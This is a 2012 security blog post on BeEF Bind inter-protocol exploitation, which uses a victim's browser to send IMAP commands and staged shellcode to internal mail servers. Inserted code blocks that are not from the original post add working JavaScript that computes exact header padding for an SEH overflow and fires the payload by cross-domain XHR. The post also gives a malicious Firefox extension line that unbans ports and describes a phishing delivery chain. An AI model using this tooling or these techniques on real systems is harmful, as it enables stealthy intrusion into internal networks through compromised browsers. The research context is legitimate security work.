Sunday, November 4, 2012

Revitalizing the Inter-Protocol Exploitation with BeEF Bind

My last two talks about BeEF were great successes. I presented together with Ty Miller at RuxCon 2012 in the land of the BeEF, Australia. Then I presented the same talk, unfortunately without Ty, at OWASP AppSec USA, in yet another land of the BeEF, Texas (Austin) :D

The RuxCon talk was on the first day at 9:00 AM, after a night of drinking. By 9:10 AM the room was packed and people couldn't get in :D

[Photo: Ty and me]
Ty and I decided to release the new BeEF Bind research at RuxCon for various reasons:
  •  RuxCon is an old and underground conference, full of proper hackers and friends, not script-kiddies;
  •  many people from the project (Wade, Brendan, Christian, Ben, Scotty: basically everyone except Ryan, Heather, Saafan, Bart, Quentin and me :-) are from Australia;
  •  I had never been to the land of the kangaroos.

This research revitalizes Wade's 2007 research on IPEC (Inter-Protocol Exploitation) in the following ways:
  •  We use XMLHttpRequest instead of HTML forms to send cross-domain POST requests
  •  A new staging shellcode has been developed specifically for this attack technique
  •  Everything has been merged into BeEF, with new features to make exploitation more reliable

The original idea behind IPEC is to exploit "tolerant" network protocols: implementations that do not close the client connection when invalid protocol commands are sent. Let's say you have an IMAP server, and instead of sending LOGIN ciccio PASS pasticcio, which are valid commands, you send LOGIN ciccio CAZZ pasticcio. CAZZ is not a valid IMAP command, but even if we fuzz the endpoint a thousand times with the same CAZZ garbage, the connection is never closed unless we explicitly close the socket ourselves.

This behavior differs across protocol implementations, so you may well find an IMAP implementation that does not behave this way. Our tests focused mainly on IMAP, SIP, IRC and a few SMTP implementations. More details about this will be released in the near future.

You can clearly see that this behavior has an obvious flaw. We can exploit it by encapsulating the data for the target protocol inside another protocol, say HTTP: every line that is invalid for the target protocol is rejected, but the connection stays open and every line that is valid is still parsed. In practice this means the following HTTP request can be sent:

[Screenshot: Wireshark capture of the HTTP request]

The HTTP request headers are parsed as bad commands, while the body of the request is parsed correctly because a001 LIST is a command this server accepts before authentication. After that command we are actually sending shellcode, in this case the stager of the new BeEF Bind shellcode, together with an egg-hunter and the next/current SEH pointers, because the IMAP server (Eudora Mail 3 v6.1.19.0) is vulnerable to an SEH-based overflow. When the server parses the LIST command, the shellcode is loaded into the process's memory and binds a socket on port 4444. This is not yet a bind shell: the stager only listens for the next request.
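The parsing behavior described above, as an added example that is not code from the original post or from BeEF. It is a toy line-oriented IMAP-style command loop: the command set, the replies and the POST request are constructed for illustration and model no particular IMAP product. The point it shows is that a tolerant server answers every HTTP header line with BAD and then executes the command carried in the body, whereas a strict server drops the connection at the first bad line and the body never gets parsed.

```javascript
// Added example (not from the original post or BeEF): a toy line-oriented
// IMAP-style server showing why IPEC works against a "tolerant" implementation.
// Command set, replies and the request below are constructed for illustration.

// A cross-origin POST as a browser would emit it (constructed). To an IMAP
// server every line is a command of the form "<tag> <command> [args]".
const BODY = 'a001 LIST "" AAAAAAAAAA\r\n';
const CONSTRUCTED_POST =
  "POST / HTTP/1.1\r\n" +
  "Host: 192.168.1.10:143\r\n" +
  "Origin: http://beef.example:3000\r\n" +
  "Content-Type: text/plain\r\n" +
  `Content-Length: ${BODY.length}\r\n` +
  "\r\n" +
  BODY;

// Commands the toy server handles before authentication.
const PRE_AUTH_COMMANDS = new Set(["CAPABILITY", "NOOP", "LOGOUT", "LOGIN", "LIST"]);

// Feed one raw request to the toy server. A tolerant server answers every
// unrecognised line with "<tag> BAD" and keeps reading; a strict server
// closes the connection at the first bad command.
function imapServerFeed(raw, { tolerant = true } = {}) {
  const lines = raw.split("\r\n");
  if (lines[lines.length - 1] === "") lines.pop(); // drop the trailing CRLF
  const replies = [];
  const handled = []; // lines the server actually executed
  let closed = false;

  for (const line of lines) {
    const [tagRaw, cmd = ""] = line.split(/\s+/, 2);
    const tag = tagRaw || "*"; // the blank header/body separator has no tag
    if (PRE_AUTH_COMMANDS.has(cmd.toUpperCase())) {
      handled.push(line);
      replies.push(`${tag} OK ${cmd.toUpperCase()} completed`);
      continue;
    }
    replies.push(`${tag} BAD Unknown command`);
    if (!tolerant) {
      closed = true;
      break;
    }
  }
  return { replies, handled, closed };
}

// Quick tolerance probe: did the connection survive the HTTP header lines and
// did the command in the body get executed?
function ipecPayloadReached(raw) {
  const r = imapServerFeed(raw);
  return !r.closed && r.handled.length === 1;
}
```

Run `imapServerFeed(CONSTRUCTED_POST)` and `imapServerFeed(CONSTRUCTED_POST, { tolerant: false })` to see the two behaviors side by side: six BAD replies followed by an OK for the LIST line in the first case, a single BAD and a closed connection in the second.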

The next step is sending the stage to this port, as another POST request.

Once the stage is running in memory, port 4444 is listening again, this time waiting for POST requests like:

[Screenshot: Wireshark capture of a request to the deployed stage]

Note the Access-Control-Allow-Origin header in the stage's reply, which enables cross-domain communication using CORS.
This means that once the stage is deployed, we can talk to the shellcode cross-domain from JavaScript and read the HTTP response, without violating or bypassing the Same Origin Policy.

The only cross-domain requests whose responses we cannot read are the ones that deliver the stager and the stage: the IMAP server's replies carry no CORS header, so the browser withholds them from JavaScript. Being able to read them would have been very helpful, because we could have fingerprinted the service properly.
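The distinction drawn in the last two paragraphs, as an added example that is not code from the original post or from BeEF: the check a browser applies before handing a cross-origin response to script, run over two constructed replies. One is a reply from the BeEF Bind stage acting as a minimal HTTP server on port 4444, the other is what a plain IMAP server returns for the stager POST. The origins, header values and body are illustrative, and the credentials case is included because a wildcard origin is refused there even though the header is present.

```javascript
// Added example (not from the original post or BeEF): the basic CORS rule a
// browser applies to a cross-origin XHR response. Origins, headers and bodies
// below are constructed for illustration.

const BEEF_ORIGIN = "http://beef.example:3000";

// Constructed reply from the deployed stage listening on port 4444. The stage
// speaks just enough HTTP to carry the CORS header the browser looks for.
const STAGE_REPLY =
  "HTTP/1.1 200 OK\r\n" +
  "Access-Control-Allow-Origin: *\r\n" +
  "Content-Type: text/plain\r\n" +
  "Content-Length: 3\r\n" +
  "\r\n" +
  "OK\n";

// Constructed reply the IMAP server produces for the stager POST: not HTTP at all.
const IMAP_REPLY =
  "POST BAD Unknown command\r\n" +
  "Host: BAD Unknown command\r\n" +
  "a001 OK LIST completed\r\n";

// Parse the status line and headers of an HTTP/1.x reply; null if it is not HTTP.
function parseHttpReply(raw) {
  const end = raw.indexOf("\r\n\r\n");
  const head = end === -1 ? raw : raw.slice(0, end);
  const [statusLine, ...headerLines] = head.split("\r\n");
  if (!/^HTTP\/1\.[01] \d{3}/.test(statusLine)) return null;
  const headers = {};
  for (const l of headerLines) {
    const i = l.indexOf(":");
    if (i > 0) headers[l.slice(0, i).trim().toLowerCase()] = l.slice(i + 1).trim();
  }
  return {
    status: Number(statusLine.slice(9, 12)),
    headers,
    body: end === -1 ? "" : raw.slice(end + 4),
  };
}

// Can script running at `origin` read this cross-origin response?
// Access-Control-Allow-Origin must be "*" or exactly the requesting origin,
// and "*" is not accepted when the request was sent with credentials.
function crossOriginReadable(origin, raw, { withCredentials = false } = {}) {
  const reply = parseHttpReply(raw);
  if (!reply) return { readable: false, reason: "response is not HTTP" };
  const acao = reply.headers["access-control-allow-origin"];
  if (acao === undefined) return { readable: false, reason: "no Access-Control-Allow-Origin" };
  if (acao === "*") {
    return withCredentials
      ? { readable: false, reason: "wildcard origin not allowed with credentials" }
      : { readable: true, body: reply.body };
  }
  if (acao === origin) return { readable: true, body: reply.body };
  return { readable: false, reason: `origin ${origin} not allowed (${acao})` };
}
```

The request still reaches the server in both cases; what the CORS check decides is only whether the reply comes back to the hooked page. That is why the stager and stage POSTs are blind, while everything after the stage is up is a normal readable exchange.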

From a low-level point of view, here is how the request looks in the IMAP process's memory:

[Screenshot: the POST request as it sits in the IMAP process's memory]

You can clearly see that the HTTP request headers are in memory. They play the role of the garbage/NOP bytes that a normal exploit sends to fill, say, 800 bytes of buffer before reaching the pointers we can overwrite. This adds complexity to the exploitation: we cannot know in advance the exact size of the HTTP request headers the browser will add (and the XMLHttpRequest object cannot be queried for it), and an error of a single byte means the exploit fails. To calculate the size we send a POST request back to BeEF on a different port (so that the request is still cross-domain and the browser adds the same headers it will add for the target). That tells us exactly the size of the headers that will be sent to the target; we then only need to adjust for the Host header, which is obviously different for the target.
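The offset calculation above, as an added example that is not code from the original post or from BeEF. It assumes the probe headers were captured verbatim by the attacker's listener, that the target's receive buffer holds the whole request starting at the request line, and that the SEH record must start at a fixed offset into that buffer (800 here, a made-up value); the probe header lines, target address and command prefix are constructed. It goes a step beyond the post in two ways: Content-Length depends on the body length, which depends on the padding, so the size is solved as a fixed point (with a slack byte after the marker when the digit count flips), and the browser-side send is kept a CORS "simple request" so that no OPTIONS preflight is sent, since the IMAP server could never answer one.

```javascript
// Added example (not from the original post or BeEF): solving the header-size
// problem for an IPEC request. Probe lines, target, offset and command prefix
// are constructed for illustration; all strings are ASCII so .length is bytes.

// Header lines of a probe POST as captured server-side by the attacker's
// listener (constructed, modelled on a 2012-era Firefox request). The browser
// sends the same headers to the real target; only Host and Content-Length change.
const PROBE_HEADER_LINES = [
  "POST / HTTP/1.1",
  "Host: beef.example:3001",
  "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
  "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  "Origin: http://beef.example:3000",
  "Content-Length: 5",
  "Content-Type: text/plain; charset=UTF-8",
];

const IMAP_PREFIX = 'a001 LIST "" '; // the command the target actually parses
const MARKER = "nSEHhSEH";           // 8 placeholder bytes where next-SEH/SEH would go

// Render the header block the target will receive for a body of bodyLen bytes.
function renderHeaders(probeLines, targetHost, bodyLen) {
  const lines = probeLines.map((l) => {
    if (/^Host:/i.test(l)) return `Host: ${targetHost}`;
    if (/^Content-Length:/i.test(l)) return `Content-Length: ${bodyLen}`;
    return l;
  });
  return lines.join("\r\n") + "\r\n\r\n";
}

// Find the padding so that MARKER starts exactly targetOffset bytes into the
// receive buffer. Iterate to a fixed point because Content-Length changes with
// the body length. At a digit boundary (body 999 vs 1000 bytes) the iteration
// cycles; a slack byte appended *after* the marker breaks the tie without
// moving the marker.
function solvePadding(probeLines, targetHost, targetOffset, prefix = IMAP_PREFIX, marker = MARKER) {
  for (let slack = 0; slack < 2; slack++) {
    let padding = 0;
    const seen = new Set();
    while (!seen.has(padding)) {
      seen.add(padding);
      const bodyLen = prefix.length + padding + marker.length + slack + 2; // +2 for CRLF
      const headerLen = renderHeaders(probeLines, targetHost, bodyLen).length;
      const next = targetOffset - headerLen - prefix.length;
      if (next < 0) throw new Error("offset lies inside the HTTP headers; unreachable");
      if (next === padding) return { padding, slack, headerLen };
      padding = next;
    }
  }
  throw new Error("could not converge on a padding length");
}

// Assemble the request exactly as the receive buffer will hold it.
function buildIpecRequest(probeLines, targetHost, targetOffset) {
  const { padding, slack, headerLen } = solvePadding(probeLines, targetHost, targetOffset);
  const body = IMAP_PREFIX + "A".repeat(padding) + MARKER + "B".repeat(slack) + "\r\n";
  const headers = renderHeaders(probeLines, targetHost, body.length);
  const full = headers + body;
  return { headers, body, full, headerLen, markerOffset: full.indexOf(MARKER) };
}

// Pre-flight sanity check before firing: declared Content-Length must equal
// the real body length, and the marker must sit at the intended offset.
function checkRequest(req, targetOffset) {
  const m = /Content-Length: (\d+)/.exec(req.headers);
  return m !== null && Number(m[1]) === req.body.length && req.markerOffset === targetOffset;
}

// Browser side (only meaningful in a page; returns false under Node). A
// text/plain body with no custom headers keeps this a CORS "simple request",
// so the browser sends the POST directly instead of an OPTIONS preflight.
// Pass an ArrayBuffer for real shellcode so bytes above 0x7F are sent raw
// rather than UTF-8 encoded.
function sendViaXhr(url, body) {
  if (typeof XMLHttpRequest === "undefined") return false;
  const xhr = new XMLHttpRequest();
  xhr.open("POST", url, true);
  xhr.setRequestHeader("Content-Type", "text/plain");
  xhr.send(body);
  return true;
}
```

Usage: `const req = buildIpecRequest(PROBE_HEADER_LINES, "192.168.1.10:143", 800);` then `checkRequest(req, 800)` before `sendViaXhr("http://192.168.1.10:143/", req.body)`. Only the body is handed to the XHR; the browser adds the headers itself, which is exactly why their size had to be measured rather than chosen.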

Some of you may be wondering: wait a second, how can you send cross-domain POST requests to port 143 at all, when browsers ban that port? True, there is no magic here.

A prerequisite is to disable port banning for the selected ports, which we do by delivering a malicious Firefox extension. As you know, Firefox extensions (the legacy XUL/XPCOM extensions of the time) have no restrictions on which configuration preferences they can override. So, basically, everything reachable from about:config can be overwritten or modified.

So it's enough to deliver a malicious (or backdoored) Firefox extension whose prefs.js contains the following line, which overrides Firefox's network.security.ports.banned.override preference (the preference name was missing from the original line):

pref("network.security.ports.banned.override", "20,21,22,25,110,143");

to disable port banning for those selected ports.

Our research has focused on, and currently works reliably against, the latest Firefox. It also works in WebKit-based browsers (Chrome/Safari) as long as you target ports that are not banned; I still need to find a way to disable port banning in WebKit-based browsers. Opera and Internet Explorer are still untested. IE has an additional limitation: it looks like cross-domain POST requests cannot be sent.

The impact of this research is "rooting your internals" (i.e. internal network services) from a browser that sits inside the internal network, using only the browser as the pivot for the internal attacks. Communication with the shellcode happens entirely in-browser via BeEF; no additional reverse sockets are opened. From a forensics point of view this makes it much harder to understand what is happening, or what happened: the attack is much more stealthy.

Slides from our RuxCon talk here:

I've also uploaded the screencast of the demo we showed at RuxCon to my Vimeo channel:
The demo covers a phishing scenario using the BeEF Social Engineering extension, and shows all the steps required to use the BeEF Bind shellcode: from delivery of the malicious Firefox extension, to identification and port scanning of live internal systems, finishing with exploitation using IPEC.

Expect more goodness on this topic in the near future.

If you want to help debug/analyze known or new exploits and see whether they can be ported to this technique, let us know. Your help will be greatly appreciated.
